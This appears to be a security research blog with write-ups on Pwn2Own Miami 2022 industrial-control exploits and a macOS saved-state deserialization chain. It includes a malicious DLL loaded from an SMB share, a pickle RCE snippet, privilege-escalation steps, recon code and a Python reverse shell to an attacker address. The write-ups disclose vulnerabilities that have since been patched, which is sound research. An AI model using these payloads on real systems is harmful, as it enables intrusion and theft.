Confirmed! @daankeuper & @xnyhps from @sector7_nl used an uncontrolled search path vuln to get RCE in AVEVA Edge. They win $20,000 and 20 Master of Pwn points. #Pwn2Own #P2O

— Zero Day Initiative (@thezdi) April 19, 2022

AVEVA Edge can be used to design Human Machine Interfaces (HMI). It allows for the designing of GUI applications, which can be programmed using a scripting language. The screenshot below shows one of the demo projects that come with the installer:


For this category it was acceptable to achieve code execution by opening a project file within the target on the contest laptop. So we tried various things to get code execution from opening a malicious project file. The application has quite a lot of functionality that might be useful for achieving our goal: users can add custom controls to a project, it has a powerful scripting language, and it connects to OPC UA servers upon starting, for example. However, most of this attack surface requires the user to first make one or more clicks within the application, which was not allowed for the competition.

Communication drivers

AVEVA Edge also allows users to add communication drivers to a project. For example, it has drivers to allow communication with a Siemens S7 PLC over a serial interface. Drivers in this case are just DLL files that are loaded into the project.


Drivers are loaded whenever the user loads a project file in AVEVA Edge, which would mean that vulnerabilities here would be triggered without further user interaction.

AVEVA Edge projects consist of multiple files and directories, but the main project file that is also associated with the application is an INI-formatted file using the .app extension. The relevant section for communication drivers can be seen below:

Task0=Driver ABCIP

When looking at the loading process with Procmon we see that drivers are loaded from C:\Program Files (x86)\AVEVA\AVEVA Edge 2020\Drv\:

Let's see what happens if we change the INI file to:

Task0=Driver ..\Computest

Loading the new project shows us:

Interesting :)…

For those interested, the actual loading of the file happens in Bin/Studio.dll at address 0x100c16f1.


From here exploitation is easy, we create a malicious DLL file:

// dllmain.cpp
#include "pch.h"

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    // Declare the (empty) startup structures CreateProcessA needs.
    STARTUPINFOA si = { sizeof(si) };
    PROCESS_INFORMATION pi = { 0 };

    // Launch the calculator as proof of code execution.
    CreateProcessA(NULL, (LPSTR)"calc.exe", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);

    return TRUE;
}

And let it load from an open SMB share:

Task0=Driver \\<IP>\shared\Sector7

You can see the exploit in action in the screen recording below.


Interestingly enough, all binaries that come with AVEVA Edge, including the drivers, are digitally signed. However, it appears that signatures are not checked when loading libraries.

Customers who use AVEVA Edge should update to version 2020 R2 SP1 and apply HF 2020.2.00.40, which should mitigate this issue.

We thank Zero Day Initiative for organizing this year's edition of Pwn2Own Miami, and we hope to return at a later edition!

You can find the other four write-ups here:

  • Pwn2Own Miami 2022: OPC UA .NET Standard Trusted Application Check Bypass
  • Pwn2Own Miami 2022: Inductive Automation Ignition Remote Code Execution
  • Pwn2Own Miami 2022: Unified Automation C++ Demo Server DoS
  • Pwn2Own Miami 2022: ICONICS GENESIS64 Arbitrary Code Execution

Process injection: breaking all macOS security layers with a single vulnerability

12 August 2022 at 00:00

If you have created a new macOS app with Xcode 13.2, you may have noticed this new method in the template:

- (BOOL)applicationSupportsSecureRestorableState:(NSApplication *)app {
	return YES;
}

This was added to the Xcode template to address a process injection vulnerability we reported!

In October 2021, Apple fixed CVE-2021-30873. This was a process injection vulnerability affecting (essentially) all macOS AppKit-based applications. We reported this vulnerability to Apple, along with methods to use this vulnerability to escape the sandbox, elevate privileges to root and bypass the filesystem restrictions of SIP. In this post, we will first describe what process injection is, then the details of this vulnerability and finally how we abused it.

This research was also published at Black Hat USA 2022 and DEF CON 30.

Process injection

Process injection is the ability for one process to execute code in a different process. In Windows, one reason this is used is to evade detection by antivirus scanners, for example by a technique known as DLL hijacking. This allows malicious code to pretend to be part of a different executable. On macOS, this technique can have significantly more impact than that due to the difference in permissions two applications can have.

In the classic Unix security model, each process runs as a specific user. Each file has an owner, group and flags that determine which users are allowed to read, write or execute that file. Two processes running as the same user have the same permissions: it is assumed there is no security boundary between them. Users are security boundaries, processes are not. If two processes are running as the same user, then one process could attach to the other as a debugger, allowing it to read or write the memory and registers of that other process. The root user is an exception, as it has access to all files and processes. Thus, root can always access all data on the computer, whether on disk or in RAM.

This was, in essence, the same security model as macOS until the introduction of SIP, also known as “rootless”. This name doesn't mean that there is no root user anymore, but that root is now less powerful on its own. For example, certain files can no longer be read by the root user unless the process also has specific entitlements. Entitlements are metadata that is included when generating the code signature for an executable. Checking if a process has a certain entitlement is an essential part of many security measures in macOS. The Unix ownership rules are still present; this is an additional layer of permission checks on top of them. Access to certain sensitive files (e.g. the mail database) and features (e.g. the webcam) is no longer possible with only root privileges but requires an additional entitlement. In other words, privilege escalation is not enough to fully compromise the sensitive data on a Mac.

For example, using the following command we can see the entitlements of Mail.app:

$ codesign -dvvv --entitlements - /System/Applications/Mail.app

In the output, we see the following entitlement:

	[Key] com.apple.rootless.storage.Mail
	[Value]
		[Bool] true

This is what grants the permission to read the SIP protected mail database, while malware will not be able to read it.

Aside from entitlements, there are also the permissions handled by Transparency, Consent and Control (TCC). This is the mechanism by which applications can request access to, for example, the webcam, microphone and (in recent macOS versions) also files such as those in the Documents and Downloads folders. This means that even applications that do not use the Mac Application sandbox might not have access to certain features or files.

Of course entitlements and TCC permissions would be useless if any process could just attach as a debugger to another process of the same user. If one application has access to the webcam but another doesn't, then the second process could attach as a debugger to the first and inject some code to steal the webcam video. To fix this, the ability to debug other applications has been heavily restricted.

Changing a security model that has been used for decades to a more restrictive model is difficult, especially in something as complicated as macOS. Attaching debuggers is just one example, there are many similar techniques that could be used to inject code into a different process. Apple has squashed many of these techniques, but many other ones are likely still undiscovered.

Aside from Apple’s own code, these vulnerabilities could also occur in third-party software. It’s quite common to find a process injection vulnerability in a specific application, which means that the permissions (TCC permissions and entitlements) of that application are up for grabs for all other processes. Getting those fixed is a difficult process, because many third-party developers are not familiar with this new security model. Reporting these vulnerabilities often requires fully explaining this new model! Especially Electron applications are infamous for being easy to inject into, as it is possible to replace their JavaScript files without invalidating the code signature.

More dangerous than a process injection vulnerability in one application is a process injection technique that affects multiple, or even all, applications. This would give access to a large number of different entitlements and TCC permissions. A generic process injection vulnerability affecting all applications is a very powerful tool, as we’ll demonstrate in this post.

The saved state vulnerability

When shutting down a Mac, it will prompt you to ask if the currently open windows should be reopened the next time you log in. This is part of functionality called “saved state” or “persistent UI”.

When reopening the windows, it can even restore new documents that were not yet saved in some applications.

It is used in more places than just at shutdown. For example, it is also used for a feature called App Nap. When an application has been inactive for a while (it has not been the focused application, is not playing audio, etc.), the system can tell it to save its state and then terminate the process. macOS keeps showing a static image of the application's windows, and in the Dock it still appears to be running, while it is not. When the user switches back to the application, it is quickly launched and resumes its state. Internally, this also uses the same saved state functionality.

When building an application using AppKit, support for saving the state is for a large part automatic. In some cases the application needs to include its own objects in the saved state to ensure the full state can be recovered, for example in a document-based application.

Each time an application loses focus, it writes to the files:

~/Library/Saved Application State/<Bundle ID>.savedState/windows.plist
~/Library/Saved Application State/<Bundle ID>.savedState/data.data

The windows.plist file contains a list of all of the application’s open windows. (And some other things that don’t look like windows, such as the menu bar and the Dock menu.)

For example, a windows.plist file could look like this:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
		<key>MenuBar AvailableSpace</key>
		<string>{{7, 454}, {14, 16}}</string>
		<string>177 501 586 476 0 0 1680 1025 </string>
		<string>{{27, 454}, {14, 16}}</string>
		<string>{{47, 454}, {14, 16}}</string>
				<string>New Document</string>

The data.data file contains a custom binary format. It consists of a list of records; each record contains an AES-CBC encrypted serialized object. The windows.plist file contains the key (NSDataKey) and an ID (NSWindowID) for the record it corresponds to.1

For example:

00000000  4e 53 43 52 31 30 30 30  00 00 00 01 00 00 01 b0  |NSCR1000........|
00000010  ec f2 26 b9 8b 06 c8 d0  41 5d 73 7a 0e cc 59 74  |..&.....A]sz..Yt|
00000020  89 ac 3d b3 b6 7a ab 1b  bb f7 84 0c 05 57 4d 70  |..=..z.......WMp|
00000030  cb 55 7f ee 71 f8 8b bb  d4 fd b0 c6 28 14 78 23  |.U..q.......(.x#|
00000040  ed 89 30 29 92 8c 80 bf  47 75 28 50 d7 1c 9a 8a  |..0)....Gu(P....|
00000050  94 b4 d1 c1 5d 9e 1a e0  46 62 f5 16 76 f5 6f df  |....]...Fb..v.o.|
00000060  43 a5 fa 7a dd d3 2f 25  43 04 ba e2 7c 59 f9 e8  |C..z../%C...|Y..|
00000070  a4 0e 11 5d 8e 86 16 f0  c5 1d ac fb 5c 71 fd 9d  |...]........\q..|
00000080  81 90 c8 e7 2d 53 75 43  6d eb b6 aa c7 15 8b 1a  |....-SuCm.......|
00000090  9c 58 8f 19 02 1a 73 99  ed 66 d1 91 8a 84 32 7f  |.X....s..f....2.|
000000a0  1f 5a 1e e8 ae b3 39 a8  cf 6b 96 ef d8 7b d1 46  |.Z....9..k...{.F|
000000b0  0c e2 97 d5 db d4 9d eb  d6 13 05 7d e0 4a 89 a4  |...........}.J..|
000000c0  d0 aa 40 16 81 fc b9 a5  f5 88 2b 70 cd 1a 48 94  |..@.......+p..H.|
000000d0  47 3d 4f 92 76 3a ee 34  79 05 3f 5d 68 57 7d b0  |G=O.v:.4y.?]hW}.|
000000e0  54 6f 80 4e 5b 3d 53 2a  6d 35 a3 c9 6c 96 5f a5  |To.N[=S*m5..l._.|
000000f0  06 ec 4c d3 51 b9 15 b8  29 f0 25 48 2b 6a 74 9f  |..L.Q...).%H+jt.|
00000100  1a 5b 5e f1 14 db aa 8d  13 9c ef d6 f5 53 f1 49  |.[^..........S.I|
00000110  4d 78 5a 89 79 f8 bd 68  3f 51 a2 a4 04 ee d1 45  |MxZ.y..h?Q.....E|
00000120  65 ba c4 40 ad db e3 62  55 59 9a 29 46 2e 6c 07  |e..@...bUY.)F.l.|
00000130  34 68 e9 00 89 15 37 1c  ff c8 a5 d8 7c 8d b2 f0  |4h....7.....|...|
00000140  4b c3 26 f9 91 f8 c4 2d  12 4a 09 ba 26 1d 00 13  |K.&....-.J..&...|
00000150  65 ac e7 66 80 c0 e2 55  ec 9a 8e 09 cb 39 26 d4  |e..f...U.....9&.|
00000160  c8 15 94 d8 2c 8b fa 79  5f 62 18 39 f0 a5 df 0b  |....,..y_b.9....|
00000170  3d a4 5c bc 30 d5 2b cc  08 88 c8 49 d6 ab c0 e1  |=.\.0.+....I....|
00000180  c1 e5 41 eb 3e 2b 17 80  c4 01 64 3d 79 be 82 aa  |..A.>+....d=y...|
00000190  3d 56 8d bb e5 7a ea 89  0f 4c dc 16 03 e9 2a d8  |=V...z...L....*.|
000001a0  c5 3e 25 ed c2 4b 65 da  8a d9 0d d9 23 92 fd 06  |.>%..Ke.....#...|
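Based on the layout visible in this hexdump (an 8-byte "NSCR1000" magic, a big-endian NSWindowID and a big-endian total record length), reading and decrypting a record could be sketched as follows in Python. The assumptions here are ours: that windows.plist is an array of window dictionaries, and that the first 16 payload bytes act as the CBC IV.

import plistlib
import struct
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

def read_first_record(savedstate_dir):
    # Map NSWindowID -> NSDataKey from windows.plist (assumed structure).
    with open(savedstate_dir + "/windows.plist", "rb") as f:
        windows = plistlib.load(f)
    keys = {w["NSWindowID"]: w["NSDataKey"] for w in windows if "NSDataKey" in w}

    # Parse the first record header of data.data: magic, window ID, length.
    with open(savedstate_dir + "/data.data", "rb") as f:
        magic, window_id, length = struct.unpack(">8sII", f.read(16))
        assert magic == b"NSCR1000"
        payload = f.read(length - 16)

    # Assumed: the IV precedes the AES-CBC encrypted serialized object.
    iv, ciphertext = payload[:16], payload[16:]
    cipher = Cipher(algorithms.AES(keys[window_id]), modes.CBC(iv))
    return cipher.decryptor().update(ciphertext)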

Whenever an application is launched, AppKit will read these files and restore the windows of the application. This happens automatically, without the app needing to implement anything. The code for reading these files is quite careful: if the application crashed, then maybe the state is corrupted too. If the application crashes while restoring the state, then the next time the state is discarded and it does a fresh start.

The vulnerability we found is that the encrypted serialized object stored in the file was not using “secure coding”. To explain what that means, we’ll first explain serialization vulnerabilities, in particular on macOS.

Serialized objects

Many object-oriented programming languages have added support for binary serialization, which turns an object into a bytestring and back. Contrary to XML and JSON, these are custom, language specific formats. In some programming languages, serialization support for classes is automatic, in other languages classes can opt-in.

In many of those languages these features have led to vulnerabilities. The problem in many implementations is that an object is created first, and then its type is checked. Methods may be called on these objects when creating or destroying them. By combining objects in unusual ways, it is sometimes possible to gain remote code execution when a malicious object is deserialized. It is, therefore, not a good idea to use these serialization functions for any data that might be received over the network from an untrusted party.

For Python pickle and Ruby Marshal.load, remote code execution is straightforward. In Java (ObjectInputStream.readObject) and C#, RCE is possible if certain commonly used libraries are used. The ysoserial and ysoserial.net tools can be used to generate a payload depending on the libraries in use. In PHP, exploitability for RCE is rare.
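For reference, the canonical Python pickle example: __reduce__ lets an object dictate a callable to be invoked at load time, so unpickling untrusted data is equivalent to running untrusted code.

import os
import pickle

class Evil:
    def __reduce__(self):
        # Tell the unpickler to call os.system("id") when loading.
        return (os.system, ("id",))

payload = pickle.dumps(Evil())
pickle.loads(payload)  # runs `id` -- never unpickle untrusted data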

Objective-C serialization

In Objective-C, classes can implement the NSCoding protocol to be serializable. Subclasses of NSCoder, such as NSKeyedArchiver and NSKeyedUnarchiver, can be used to serialize and deserialize these objects.

How this works in practice is as follows. A class that implements NSCoding must include a method:

- (id)initWithCoder:(NSCoder *)coder;

In this method, this object can use coder to decode its instance variables, using methods such as -decodeObjectForKey:, -decodeIntegerForKey:, -decodeDoubleForKey:, etc. When it uses -decodeObjectForKey:, the coder will recursively call -initWithCoder: on that object, eventually decoding the entire graph of objects.

Apple has also realized the risk of deserializing untrusted input, so in 10.8, the NSSecureCoding protocol was added. The documentation for this protocol states:

A protocol that enables encoding and decoding in a manner that is robust against object substitution attacks.

This means that instead of creating an object first and then checking its type, a set of allowed classes needs to be included when decoding an object.

So instead of the unsafe construction:

id obj = [decoder decodeObjectForKey:@"myKey"];
if (![obj isKindOfClass:[MyClass class]]) { /* */ }

The following must be used:

id obj = [decoder decodeObjectOfClass:[MyClass class] forKey:@"myKey"];

This means that when a secure coder is created, -decodeObjectForKey: is no longer allowed, but -decodeObjectOfClass:forKey: must be used.

That makes exploitable vulnerabilities significantly harder, but they can still happen. One thing to note here is that subclasses of the specified class are allowed. If, for example, the NSObject class is specified, then all classes implementing NSCoding are still allowed. If only NSDictionary objects are expected and an imported framework contains a rarely used and vulnerable subclass of NSDictionary, then this could also create a vulnerability.
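Python's rough analogue of this allow-list approach is overriding Unpickler.find_class, as suggested in the pickle documentation; the same caveat about being too permissive applies there as well:

import io
import pickle
from collections import OrderedDict

class RestrictedUnpickler(pickle.Unpickler):
    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        # Only resolve classes that are explicitly allowed.
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("%s.%s is not allowed" % (module, name))

data = pickle.dumps(OrderedDict(a=1))
print(RestrictedUnpickler(io.BytesIO(data)).load())  # OrderedDict([('a', 1)])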

In all of Apple’s operating systems, these serialized objects are used all over the place, often for inter-process exchange of data. For example, NSXPCConnection heavily relies on secure serialization for implementing remote method calls. In iMessage, these serialized objects are even exchanged with other users over the network. In such cases it is very important that secure coding is always enabled.

Creating a malicious serialized object

In the data.data file for saved states, objects were stored using an NSKeyedArchiver without secure coding enabled. This means we could include objects of any class that implements the NSCoding protocol. The likely reason for this is that applications can extend the saved state with their own objects, and because the saved state functionality is older than NSSecureCoding, Apple couldn't just upgrade this to secure coding, as this could break third-party applications.

To exploit this, we wanted a method for constructing a chain of objects that could allow us to execute arbitrary code. However, no project similar to ysoserial for Objective-C appears to exist, and we could not find other examples of abusing insecure deserialization in macOS. In Remote iPhone Exploitation Part 1: Poking Memory via iMessage and CVE-2019-8641, Samuel Groß of Google Project Zero describes an attack against a secure coder by abusing a vulnerability in NSSharedKeyDictionary, an uncommon subclass of NSDictionary. As this vulnerability is now fixed, we couldn't use this.

By decompiling a large number of -initWithCoder: methods in AppKit, we eventually found a combination of 2 objects that we could use to call arbitrary Objective-C methods on another deserialized object.

We start with NSRuleEditor. The -initWithCoder: method of this class creates a binding to an object from the same archive with a key path also obtained from the archive.

Bindings are a reactive programming technique in Cocoa. It makes it possible to directly bind a model to a view, without the need for the boilerplate code of a controller. Whenever a value in the model changes, or the user makes a change in the view, the changes are automatically propagated.

A binding is created by calling the method:

- (void)bind:(NSBindingName)binding 
    toObject:(id)observable 
 withKeyPath:(NSString *)keyPath 
     options:(NSDictionary<NSBindingOption, id> *)options;

This binds the property binding of the receiver to the keyPath of observable. A keypath is a string that can be used, for example, to access nested properties of the object. But the more common method for creating bindings is to create them as part of a XIB file in Xcode.

For example, suppose the model is a class Person, which has a property @property (readwrite, copy) NSString *name;. Then you could bind the “value” of a text field to the “name” keypath of a Person to create a field that shows (and can edit) the person’s name.

In the XIB editor, this would be created as follows:

The different options for what a keypath can mean are actually quite complicated. For example, when binding with a keypath of “foo”, it would first check if one of the methods getFoo, foo, isFoo and _foo exists. This is usually used to access a property of the object, but that is not required. The method is called immediately when the binding is created, to provide an initial value; it does not matter if that method actually returns void. This means that by creating a binding during deserialization, we can use this to call zero-argument methods on other deserialized objects!
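As a toy Python model of the accessor search described above (real Key-Value Coding has more rules than this):

# For keypath "foo", try getFoo, foo, isFoo and _foo, and call the first
# match -- mirroring how creating a binding immediately invokes the accessor.
def kvc_get(obj, key):
    cap = key[0].upper() + key[1:]
    for name in ("get" + cap, key, "is" + cap, "_" + key):
        method = getattr(obj, name, None)
        if callable(method):
            return method()
    raise AttributeError(key)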

ID NSRuleEditor::initWithCoder:(ID param_1,SEL param_2,ID unarchiver)
{
	...
	id arrayOwner = [unarchiver decodeObjectForKey:@"NSRuleEditorBoundArrayOwner"];

	if (arrayOwner) {
	  keyPath = [unarchiver decodeObjectForKey:@"NSRuleEditorBoundArrayKeyPath"];
	  [self bind:@"rows" toObject:arrayOwner withKeyPath:keyPath options:nil];
	}
	...
}

In this case we use it to call -draw on the next object.

The next object we use is an NSCustomImageRep object. This obtains a selector (a method name) as a string and an object from the archive. When the -draw method is called, it invokes the method from the selector on the object. It passes itself as the first argument:

ID NSCustomImageRep::initWithCoder:(ID param_1,SEL param_2,ID unarchiver)
{
	id drawObject = [unarchiver decodeObjectForKey:@"NSDrawObject"];
	self.drawObject = drawObject;
	id drawMethod = [unarchiver decodeObjectForKey:@"NSDrawMethod"];
	SEL selector = NSSelectorFromString(drawMethod);
	self.drawMethod = selector;
	...
}

void ___24-[NSCustomImageRep_draw]_block_invoke(long param_1)
{
  [self.drawObject performSelector:self.drawMethod withObject:self];
}

By deserializing these two classes we can now call zero-argument methods and multiple-argument methods, although the first argument will be an NSCustomImageRep object and the remaining arguments will be whatever happens to still be in those registers. Nevertheless, this is a very powerful primitive. We'll cover the rest of the chain we used in a future blog post.


Sandbox escape

First of all, we escaped the Mac Application sandbox with this vulnerability. To explain that, some more background on the saved state is necessary.

In a sandboxed application, many files that would be stored in ~/Library are stored in a separate container instead. So instead of saving its state in:

~/Library/Saved Application State/<Bundle ID>.savedState/

Sandboxed applications save their state to:

~/Library/Containers/<Bundle ID>/Data/Library/Saved Application State/<Bundle ID>.savedState/

Apparently, when the system is shut down while an application is still running (when the prompt is shown asking the user whether to reopen the windows the next time), the first location is symlinked to the second one by talagent. We are unsure why; it might have something to do with upgrading an application to a new version which is sandboxed.

Secondly, most applications do not have access to all files. Sandboxed applications are very restricted of course, but with the addition of TCC, even accessing the Downloads, Documents, etc. folders requires user approval. If an application opens an open or save panel, it would be quite inconvenient if the user could only see the files that that application has access to. To solve this, a different process is launched when opening such a panel: even though the window itself is part of the application, its contents are drawn by openAndSavePanelService. This is an XPC service which has full access to all files. When the user selects a file in the panel, the application gains temporary access to that file. This way, users can still browse their entire disk even in applications that do not have permission to list those files.

As it is an XPC service with service type Application, it is launched separately for each app.

What we noticed is that this XPC Service reads its saved state, but using the bundle ID of the app that launched it! As this panel might be part of the saved state of multiple applications, it does make some sense that it would need to separate its state per application.

As it turns out, it reads its saved state from the location outside of the container, but with the application’s bundle ID:

~/Library/Saved Application State/<Bundle ID>.savedState/

But as we mentioned, if the app was ever open when the user shut down their computer, then this will be a symlink to the container path.

Thus, we can escape the sandbox in the following way:

  1. Wait for the user to shut down while the app is open, if the symlink does not yet exist.
  2. Write malicious data.data and windows.plist files inside the app’s own container.
  3. Open an NSOpenPanel or NSSavePanel.

The process will now deserialize the malicious object, giving us code execution in a non-sandboxed process.

This was fixed earlier than the other issues, as CVE-2021-30659 in macOS 11.3. Apple addressed this by no longer loading the state from the same location in openAndSavePanelService.

Privilege escalation

By injecting our code into an application with a specific entitlement, we can elevate our privileges to root. For this, we could apply the technique explained by A2nkF in Unauthd - Logic bugs FTW.

Some applications have an entitlement which means that the application is allowed to install packages that have a signature generated by Apple without authorization from the user. For example, “Install Command Line Developer Tools” and “Bootcamp” have this entitlement. A2nkF also found a package signed by Apple that contains a vulnerability: macOSPublicBetaAccessUtility.pkg. When this package is installed to a specific disk, it will run (as root) a post-install script from that disk. The script assumes it is being installed to a disk containing macOS, but this is not checked. Therefore, by creating a malicious script at the same location it is possible to execute code as root by installing this package.

The exploitation steps are as follows:

  1. Create a RAM disk and copy a malicious script to the path that will be executed by macOSPublicBetaAccessUtility.pkg (steps 1 and 3 are sketched below).
  2. Inject our code into an application that has this entitlement, by creating the windows.plist and data.data files for that application and then launching it.
  3. Use the injected code to install the macOSPublicBetaAccessUtility.pkg package to the RAM disk.
  4. Wait for the post-install script to run.
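A rough sketch of steps 1 and 3, driving the standard macOS command line tools from Python. The volume name is arbitrary, the placement of the malicious script is omitted (the post-install script path depends on the package), and in the real attack this code runs inside the entitled application from step 2:

import subprocess

def create_ram_disk():
    # 204800 sectors of 512 bytes = a 100 MiB RAM disk.
    dev = subprocess.check_output(
        ["hdiutil", "attach", "-nomount", "ram://204800"]).strip().decode()
    subprocess.check_call(["diskutil", "eraseVolume", "HFS+", "RAM", dev])
    return "/Volumes/RAM"

def install_package(volume):
    # Allowed without user authorization thanks to the entitlement.
    subprocess.check_call(
        ["installer", "-pkg", "macOSPublicBetaAccessUtility.pkg",
         "-target", volume])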

In the writeup from A2nkF, the post-install script ran without the filesystem restrictions of SIP. It inherited this from the installation process, which needs it as package installation might need to write to SIP protected locations. This was fixed by Apple: post- and pre-install scripts are no longer SIP exempt. The package and its privilege escalation can still be used, however, as Apple still uses the same vulnerable installer package.

SIP filesystem bypass

Now that we have escaped the sandbox and elevated our privileges to root, we wanted to bypass SIP as well. To do this, we looked at all available applications to find one with a suitable entitlement. Eventually, we found something on the macOS Big Sur Beta installation disk image: “macOS Update” has the com.apple.rootless.install.heritable entitlement. This means that this process can write to all SIP protected locations (and the entitlement is heritable, which is convenient because we can just spawn a shell). Although it is supposed to be used only during the beta installation, we can just copy it to a normal macOS environment and run it there.

The exploitation for this is quite simple:

  1. Create malicious windows.plist and data.data files for “macOS Update”.
  2. Launch “macOS Update”.

When exempt from SIP’s filesystem restrictions, we can read all files from protected locations, such as the user’s mailbox. We can also modify the TCC database, which means we can grant ourselves permission to access the webcam, microphone, etc. We could also persist our malware on locations which are protected by SIP, making it very difficult to remove by anyone other than Apple. Finally, we can change the database of approved kernel extensions. This means that we could load a new kernel extension silently, without user approval. When combined with a vulnerable kernel extension (or a codesigning certificate that allows signing kernel extensions), we would have been able to gain kernel code execution, which would allow disabling all other restrictions too.


We recorded the following video to demonstrate the different steps. It first shows that the application “Sandbox” is sandboxed, then it escapes its sandbox and launches “Privesc”. This elevates privileges to root and launches “SIP Bypass”. Finally, this opens a reverse shell that is exempt from SIP’s filesystem restrictions, which is demonstrated by writing a file in /var/db/SystemPolicyConfiguration (the location where the database of approved kernel modules is stored):

The fix

Apple first fixed the sandbox escape in macOS 11.3, by no longer reading the saved state of the application in openAndSavePanelService (CVE-2021-30659).

Fixing the rest of the vulnerability was more complicated. Third-party applications may store their own objects in the saved state, and these objects might not support secure coding. This brings us back to the method from the introduction: -applicationSupportsSecureRestorableState:. Applications can now opt in to requiring secure coding for their saved state by returning TRUE from this method. Unless an app opts in, it will keep allowing non-secure coding, which means process injection might remain possible.

This does highlight one issue with the current design of these security measures: downgrade attacks. The code signature (and therefore entitlements) of an application will remain valid for a long time, and the TCC permissions of an application will still work if the application is downgraded. A non-sandboxed application could just silently download an older, vulnerable version of an application and exploit that. For the SIP bypass this would not work, as “macOS Update” does not run on macOS Monterey because certain private frameworks no longer contain the necessary symbols. But that is a coincidental fix, in many other cases older applications may still run fine. This vulnerability will therefore be present for as long as there is backwards compatibility with older macOS applications!

Nevertheless, if you write an Objective-C application, please make sure you implement -applicationSupportsSecureRestorableState: to return TRUE and adopt secure coding for all classes used in your saved state!


In the current security architecture of macOS, process injection is a powerful technique. A generic process injection vulnerability can be used to escape the sandbox, elevate privileges to root and bypass SIP's filesystem restrictions. We have demonstrated how we used insecure deserialization in the loading of an application's saved state to inject code into any Cocoa process. This was addressed by Apple as CVE-2021-30873.

  1. It is unclear what security the AES encryption here is meant to add, as the key is stored right next to it. There is no MAC, so no integrity check for the ciphertext. ↩︎

Pwn2Own Miami 2022: Inductive Automation Ignition Remote Code Execution

22 July 2022 at 00:00

This write-up is part 2 of a series of write-ups about the 5 vulnerabilities we demonstrated last April at Pwn2Own Miami. This is the write-up for a Remote Code Execution vulnerability in Inductive Automation Ignition, by using an authentication bypass (CVE-2022-35871).

Confirmed! @daankeuper and @xnyhps from Computest Sector 7 (@sector7_nl) used a missing authentication for critical function vuln to execute code on Inductive Automation Ignition. They win $20,000 and 20 Master of Pwn points. #Pwn2Own #P2O

— Zero Day Initiative (@thezdi) April 19, 2022

The cause of this vulnerability was a weak authentication implementation when using Active Directory single sign-on. We combined this with intended(?) functionality that allowed us to execute Python code on the server (as SYSTEM).


Inductive Automation Ignition is an application that was part of the “Control Server” category. Control servers are used to supervise and communicate with lower-level devices, such as PLCs. This makes them a critical element in any ICS network.

Ignition is organized in different projects, which are managed using a web interface. Each project needs a user source which determines the authentication and authorization for that project. Authentication can be internal, using a database, or based on Active Directory (which has some sub-options that determine how authorization is handled). The projects can then be used from Ignition Perspective, a desktop application which communicates with the Ignition server through the gateway API.

When one of the AD based user sources is configured, it offers an option named “SSO Enabled”.

To configure an AD based user source, the server needs to be configured with an AD account, the IP address of a domain controller and the Active Directory domain name. The AD account is used to set up an LDAP connection to the AD server for the application itself.


Auth bypass

While looking at the decompiled Java code (Ignition/lib/core/gateway/gateway-api-8.1.16.jar) for how the SSO authentication is handled in the gateway API, we noticed that the function implementing SSO is a lot simpler than we expected.


protected AuthenticatedUser authenticateAdSso(AuthChallenge challenge) throws Exception {
    String ssoUname = (String)challenge.get(User.Username);
    String ssoDomain = (String)challenge.get(ADSSOAuthChallenge.ADDomain);
    if (StringUtils.isBlank(ssoUname)) {
      this.log.debug("SSO username is blank.");
      return null;
    }
    if (StringUtils.isBlank(ssoDomain)) {
      this.log.debugf("SSO domain is blank for user '%s'", new Object[] { ssoUname });
      return null;
    }
    if (ssoDomain.equalsIgnoreCase(this.domain)) {
      User existingUser = this.userSource.findSSOUser(ssoUname);
      if (existingUser != null)
        return (AuthenticatedUser)new BasicAuthenticatedUser(existingUser, new Date()); 
      this.log.debug(String.format("Existing user was not found for username '%s'", new Object[] { ssoUname }));
    } else {
      this.log.debug(String.format("SSO domains did not match! Compared '%s' and '%s'", new Object[] { this.domain, ssoDomain }));
    }
    return null;
}

This function receives an AuthChallenge object (essentially a JSON dictionary). It checks that it contains a key for the username and a key for the SSO domain. Then it compares the value for the SSO domain to the configured Active Directory domain name. If it matches, it looks up the username using LDAP and, if found, returns it as an AuthenticatedUser object.

There’s no check here for a password, token, signature, or anything like that. The only data that needs to be submitted to the server is the username and the Active Directory domain name. In other words, the vulnerability here is that there is no SSO implementation at all! It’s not even clear to us what type of SSO was intended to be used here, probably Kerberos?


To go from an authenticated user to code execution, we used what we assume is intended functionality that allows us to evaluate Python on the server. There is a ScriptInvoke gateway API endpoint with an execute function. Authenticated users can submit Python code to this endpoint, which is executed on the server with the same privileges as the server (on Windows, this is SYSTEM). Ignition Designer offers the ability to execute scripts on the server in response to specific events or regular intervals. This does not appear to require any special role or permissions, so this design looks risky to us, but it does seem to function as designed.


To exploit the auth bypass, the server needs to be configured using AD authentication with SSO enabled. To perform the attack, we need the following information:

  1. The name of a project using this authentication method.
  2. The name of an existing AD user.
  3. The name of the AD domain.

It turns out that the first two were easy to obtain. There is an unauthenticated API endpoint on the admin interface returning the list of all projects:

http://<server IP>/data/perspective/projects

For the username, this simply had to be any existing AD user, regardless of permissions in AD or Ignition. So, we could just use “Administrator”, as that user will always exist in AD.

This only leaves the AD domain name, which we didn’t find a way to obtain automatically from Ignition. In practice, that value should be easy to obtain when attacking a company, especially if the attacker is already on the company’s internal network. In most cases this would just be the company’s primary domain name, or the value might leak in email headers, file metadata, etc.
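Putting the reconnaissance together, a minimal sketch; the server address and domain below are placeholders:

import requests

server = "http://192.0.2.1:8088"  # placeholder Ignition gateway address

# The project list is exposed without authentication.
resp = requests.get(server + "/data/perspective/projects")
print(resp.text)

# "Administrator" always exists in AD; the domain must be known or guessed.
username = "Administrator"
domain = "corp.example.com"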

Finally, we used a reverse shell implemented in Python to set up a connection back to our attacker machine.
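The reverse shell itself can be as simple as the following sketch (the attacker address is a placeholder, and Ignition actually embeds Jython, so the code we submitted differed in its details):

import socket
import subprocess

s = socket.create_connection(("192.0.2.99", 4444))  # attacker machine
while True:
    cmd = s.recv(4096).decode().strip()
    if not cmd:
        break
    p = subprocess.Popen(cmd, shell=True,
                         stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    out, _ = p.communicate()
    s.sendall(out)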


